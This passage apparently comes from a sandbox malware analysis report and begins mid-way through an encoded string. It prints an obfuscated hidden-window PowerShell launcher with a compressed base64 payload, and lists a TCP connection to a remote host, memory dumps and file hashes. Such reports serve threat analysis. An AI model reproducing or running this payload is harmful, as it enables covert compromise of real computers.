QBtAHEAeABRAFgAeQBiAE0AQgBKAGcASQBWAEcAVwB6AFAAaABKADcAUwBTAGkANABsAEgAWAB5AGkAagB6AFMAWQBJADgAQwBHAHMASwBYAGsASABFADkAUgB7ADEAfQBkAHkAUQBPAG4AcQAnACcAKwAnACcAVQA3AGMASgB4AEgAQQBsADgAewAxAH0AQgBxAHAAVQBWADUAQQBnAHAAcABZAHUAOAAyAEoAYQBuAHkAegBrAEkAcQBXADIARwAwADcAUwAnACcAKwAnACcAcQBEAEQATgBJAFUAcQB7ADEAfQBxAHUAQQBRAHoANABsAGMAVgBGAEsAZQAwADIARQBLAFoANABMAHUAaAB1AG4AZQAzAG4AegBGAEIAUABaAHkASwAwAHQAeABTAC8AegB1AGUAeABiAGwAdABIAHEAYwBpAHkAVAB5AEkATABHAEIAdwA1AGEANgBKAFIAegBHAFQAawBGAFMAVgBIAHYAVwBKAHQAWABWAHAAVQBKADYAdgBQAGcAdABJAEcAegBNAEcAMgBRAE8AVwA3AGkARQBnAHMAQwBLAEIAYwBJAFgAawBTAHcASwB1ADUAdAB6AFEAYQB5ADQAUgBUAHIAUgBtAEoAQQAnACcAKwAnACcASwBoAFgAZABuAG8ATQBCAHgAQQBrAFMAaQBTAFoATQBjAHcASABCAEIAZgBmAGMAbgBWAE0AaAB0ACcAJwArACcAJwB5ADYAawB0AHcAUwBsAFMAZQBPAEEAbwBSAGQAeABrAFgAVgBXAFYAQwBFAHcARgBWAFMAQQBKADkARgAvADQALwBMADMANAB1AFAANwBrADcANwBZAFEAVQBFAGQATABLAFIARgB0AFkAVwB5AEUAegBvAGUASQAvAFMASwBJAFcASQBPADAAZwBTAFEAVABBADAAVQBsADQAWgBPAEcAVQBmAEcAegBsAHAAVQBaADcAWgAxAHoAUQBJAFkASgB2AFoAdgBmAGMAdQBTAFAAYwBQAHYAegBaAFQAcwB4AG8AMwBSAG4AYgBoAC8ANwBaAEsAUgBmAGIATQA3AHQAbgA5AEwAMQAyAE8AdQB4ADIAUABpAEcANgBDAFQAYgBlAHAAdwBIAHkALwBGAE8AZgBIAEwAbQBUAGwAbgBCAFAASABOAEUAZQBvAHQANgBJAG0AbABZAHIAOQBDAHoAegBDAHMAWgBqAFIAegBoAGQAUgA4AHcAYwAxAEwAcwBLAFAAVwBZAE8AdwBZAFkANwBTADAAMgA2ADYAVQAzADcAbgBtADEAOQAzAFQAUgBTAG8ARwB1AHIAMQBiAHMAMgBVAGIAUABaAHUAbQBpAGEAdAA0AEQAZQBqAE4AYQBEAFcAewAxAH0AUQBQAEkAcgBwADUATwBJAGMAeAAxAE4AJwAnACsAJwAnAFMATABjADgAdABKAEwAZABOAGgASgA2AGYAdAB5ADUAdABwAG8AegBPAGYAcwBwADcAUgA2AG8AUwByAEsAVQAvAGQAagB6AFAAYgBNAEkAdwBqAEgAOQB2ADkATABVAEkAVwA5ADUAdgA5ADcAWABYADkAawBsAC8AMQB2AE0AaABxAHgAZAB3ADQAYQByAGQAdQAwAFEAbAAnACcAKwAnACcAQwA3AGYAaABrADAAcgBIADQAMgBjAHgASwAwAE4AQwBZADQARwBEAE4AMABlAGkAdwB5AGEATwBnAGoAVQA0AGYATABFAHIAbQBvADMASABIAEcAbwAwADYARgBoAHAAMwB2ADkAegBaAFIAMABaAGcASABFADIAdgBjAFcAaABOAEoAdwAwADYAWAAxADkAZgBoAGoARAB2AGIASABxAGoATQA4AE4AcwBPAFQANwA1AHkAdQBjAGIAQQBLADcATABFAFEANAB1AFEAUwBaAG8ATgA3AHgAdwBCAFQATAAyAGUAMgBTADkASAAvAEMAMABnAFcAOAB0AGoAaQB5AFEANgBjAHoAdgBVAEQAZQBjAHIAVAB0AEQAQgB2AHQAWAA0AHcAWgBIAEUAegBhADQAeAB1AGgAOAB2AHUAMABZAFIAbgAwADIAYgBLAEcAZQB5AGEAZgBkAEEASQAxAEEASABBAGYAVwBDAEsAUAAwADMAdgA1AHEARwAvAFcASgB6AC8AMwBwAGgAOABGAHMAWgBVAHkAdQAyAGEARgBoAHQAMABmAEQAOABGAHIAZQAyAFYAaABIADgAdgB7ADEAfQBtAFoANQA5ADUAOAAvAHIARwB1AHoAagA4AGQARAA2AGwAawA0AGkAagBzAFcARgBNADMAZwBFAGwARgBtAE0AYQBpADIAWgBqAFcAYwBrADIAWABWAGsAOQAzADcANgBwAFAASABRAG4ANAB5AGYATQBlAEsAawB6ADkASABHAFMAaABwAGcAQgBZADYARABtAGwAOABuAGIANABVAG0AbgBLAE8AUgBEAFQAcQAnACcAKwAnACcAVwBHAHAAcwBFADcANABKACcAJwArACcAJwBZAGsATQBXAEgAUQBQAGEARwAvAGwAbgBSAEgAagBIAEYAUAB0AHAAQgBkAHcAWQBmADIAbABUAGMAVgAyAGUAUABHAHoAcwA2AG4ANQAwAGEANgA4AGkAaQBvADcAMwB0AEwAdQBYAFIAOABQAEEAYwBmAEkAWQBYADgAaAA5AG8ANQBpAFEATQBSAFYAcwAyAEgAcABtAGwAQwBVAHoAQQBmAHoATgBZAHUAVQBWADUALwByAHoAWgBmAGIAegBVAHcAVgBaAFYATgBaAFEAZABMAGIAcABuAHQATABJAE0AeAB1AGwASQAwADcAVgBmAGoAQgBLADgARwBBAGUAWAByAFoAYQBSAGUAQQBnADEATwB2AG8AVgBhAEEAewAxAH0AVQB2AHoAMwA4AEoAbgBjAFUANQBlAHcAcABjAGMAYQAnACcAKwAnACcAdABIAEYAdQB4AHgAQQA4AEQAcQBjAE8AMgBGAGYAQwA5AEkAYwBvAEQANgBBAGIAbABUAEsAawBMADIAMAA2AGYAOQB1AFgASQB6AHUAZgB7ADEAfQBWAGQAQwBsAEsAVwBBAGcALwAvAHIALwBSACcAJwArACcAJwBaAGIALwAyAEQANwB1AHYAbwBwAEIAWgB6AGEASAA1AGEAZgBuAEgAaABTAGMATgA0AEoAYwBCAE0ATQBWAFUAZwBKAHcATAAnACcAKwAnACcAdABaAGkAUgAvAEkAbgB3AFAAQQA1AEYAaABqAHkASgBMAG8AUQBHAEUAbQBCAFYAZgBQAEwAWgBmAEoARwBKAGcAdwBFADgAeABIAGIATgA0AEMAOABYAEQAbwBXAFMAcQB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwArACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMEP12UCA7VWbW/aSBD{1}Xq'+'n/waqQbKsEm5c2TaRKt8YBnAQCcYAAh04be7G3WXuJvQ6hvf73m8V2SK/JXe6kWkrYl5nZ2WeemdlVFnuC8ljZOsq3t2{1}U4hviBEeKVrk/x1WlEt'+'r6fquyTrnyWdEWaL22eYRpvDw{1}bm'+'dJQmKRz2tdIlCakuiGUZJquvKnMg1JQg4ubr4QTyjflMoftS7jN5gVYts29kKiHKDYl3vn3MPSqZq7ZlRo6u{1}/q/rioL6sndxlmKWa6m5TQaKaz5iqK991'+'eeDVdk00tU{1}9hKd8JWpTGjcbtXGc4hUZgLV70ici5H6qwl32t0mIyJJ4dylpJZfRVBgOE{1}4h309ImqpVZSHtL5bL37RFcfhlFgsakZoTC5LwtUuSe{1}qRtNbDsc/IJVktQcsVCY2Dpa6D2D2/JVolzhi'+'rKv/Fj'+'DYgmxK61yppT5VAaigSvQrx/Pmafe5njOSK6jN{1}Sgro8OU0AOy{1}S/hWJW1uu'+'vWzZ4izXyi/xW6HgL/akKd0p/xZMatKH47GgidbmFaukozoy0e0lUrS{1}zCPq681Vy91QfMuhIXFhFN/uVf/IfaVsHkS2FLqZSrbZEV'+'jYm9jHFGvZKv2XEjIipEdJrVSbAAOamqxQXybMBJgIVGWzPhJ7SSi4lHXyijzSYI8CGsKXkHE9R{1}dyQOnq'+'U7cJxHAl8{1}BqpUV5AgppYu82JanyzkIqW2G07S'+'qDDNIUq{1}quAQz4lcVFKe02EKZ4Luhune3nzFBPZyK0txS/zuexbltHqciyTyILGBw5a6JRzGTkFSVHvWJtXVpUJ6vPgtIGzMG2QOW7iEgsCKBcIXkSwKu5tzQay4RTrRmJA'+'KhXdnoMBxAkSiSZMcwHBBffcnVMht'+'y6ktwSlSeOAoRdxkXVWVCEwFVSAJ9F/4/L34uP7k77YQUEdLKRFtYWyEzoeI/SKIWIO0gSQTA0Ul4ZOGUfGzlpUZ7Z1zQIYJvZvfcuSPcPvzZTsxo3Rnbh/7ZKRfbM7tn9L12Oux2PiG6CTbepwHy/FOfHLmTlnBPHNEeot6ImlYr9CzzCsZjRzhdR8wc1LsKPWYOwYY7S0266U37nm193TRSoGur1bs2UbPZumiat4DejNaDW{1}QPIrp5OIcx1N'+'SLc8tJLdNhJ6fty5tpozOfsp7R6oSrKU/djzPbMIwjH9v9LUIW95v97XX9kl/1vMhqxdw4ardu0Ql'+'C7fhk0rH42cxK0NCY4GDN0eiwyaOgjU4fLErmo3HHGo06Fhp3v9zZR0ZgHE2vcWhNJw06X19fhjDvbHqjM8NsOT75yucbAK7LEQ4uQSZoN7xwBTL2e2S9H/C0gW8tjiyQ6czvUDecrTtDBvtX4wZHEza4xuh8vu0YRn02bKGeyafdAI1AHAfWCKP03v5qG/WJz/3ph8FsZUyu2aFht0fD8Fre2VhH8v{1}mZ5958/rGuzj8dD6lk4ijsWFM3gElFmMai2ZjWck2XVk9376pPHQn4yfMeKkz9HGShpgBY6Dml8nb4UmnKORDTq'+'WGpsE74J'+'YkMWHQPaG/lnRHjHFPtpBdwYf2lTcV2ePGzs6n50a68iio73tLuXR8PAcfIYX8h9o5iQMRVs2HpmlCUzAfzNYuUV5/rzZfbzUwVZVNZQdLbpntLIMxulI07VfjBK8GAeXrZaReAg1OvoVaA{1}Uvz38JncU5ewpcca'+'tHFuxxA8DqcO2FfC9IcoD6AblTKkL206f9uXIzuf{1}VdClKWAg//r/R'+'Zb/2D7uvopBZzaH5afnHhScN4JcBMMVUgJwL'+'tZiR/InwPA5FhjyJLoQGEmBVfPLZfJGJgwE8xHbN4C8XDoWSqwsAAA{0}{0}')-f'=','+')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| CN | 1.14.247.162:40001 | tcp | |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/964-0-0x0000000074E6E000-0x0000000074E6F000-memory.dmp
memory/964-1-0x0000000002780000-0x00000000027B6000-memory.dmp
memory/964-2-0x0000000005420000-0x0000000005A48000-memory.dmp
memory/964-3-0x0000000074E60000-0x0000000075610000-memory.dmp
memory/964-4-0x0000000074E60000-0x0000000075610000-memory.dmp
memory/964-5-0x00000000051E0000-0x0000000005202000-memory.dmp
memory/964-6-0x0000000005280000-0x00000000052E6000-memory.dmp
memory/964-7-0x00000000052F0000-0x0000000005356000-memory.dmp
memory/964-8-0x0000000005A50000-0x0000000005DA4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhsxbzhn.wqy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/964-18-0x0000000006070000-0x000000000608E000-memory.dmp
memory/964-19-0x00000000060C0000-0x000000000610C000-memory.dmp
memory/964-20-0x00000000079D0000-0x000000000804A000-memory.dmp
memory/964-21-0x00000000065C0000-0x00000000065DA000-memory.dmp
memory/964-24-0x0000000074E60000-0x0000000075610000-memory.dmp
memory/4408-34-0x0000000006080000-0x00000000063D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a98089c2a26f51e109d8d675b7a0f279 |
| SHA1 | 51deee62c2d03edae85a91df86ca07959da46df4 |
| SHA256 | 0cc64b0509b0f9f8703daf833b879aaebd2ad923ef75f0c73dc07c9cfbd3f1df |
| SHA512 | b1c7f14d28949bef0c329bc7bc240e00db3a158161a279cd481d656d15da5fbf4c7235244e62a4a5dbca7c3a4ab66cfd8e1eeb9a58659b599af5c140f0cc39a5 |
memory/4408-36-0x0000000006CD0000-0x0000000006D1C000-memory.dmp
memory/4408-37-0x0000000006530000-0x0000000006531000-memory.dmp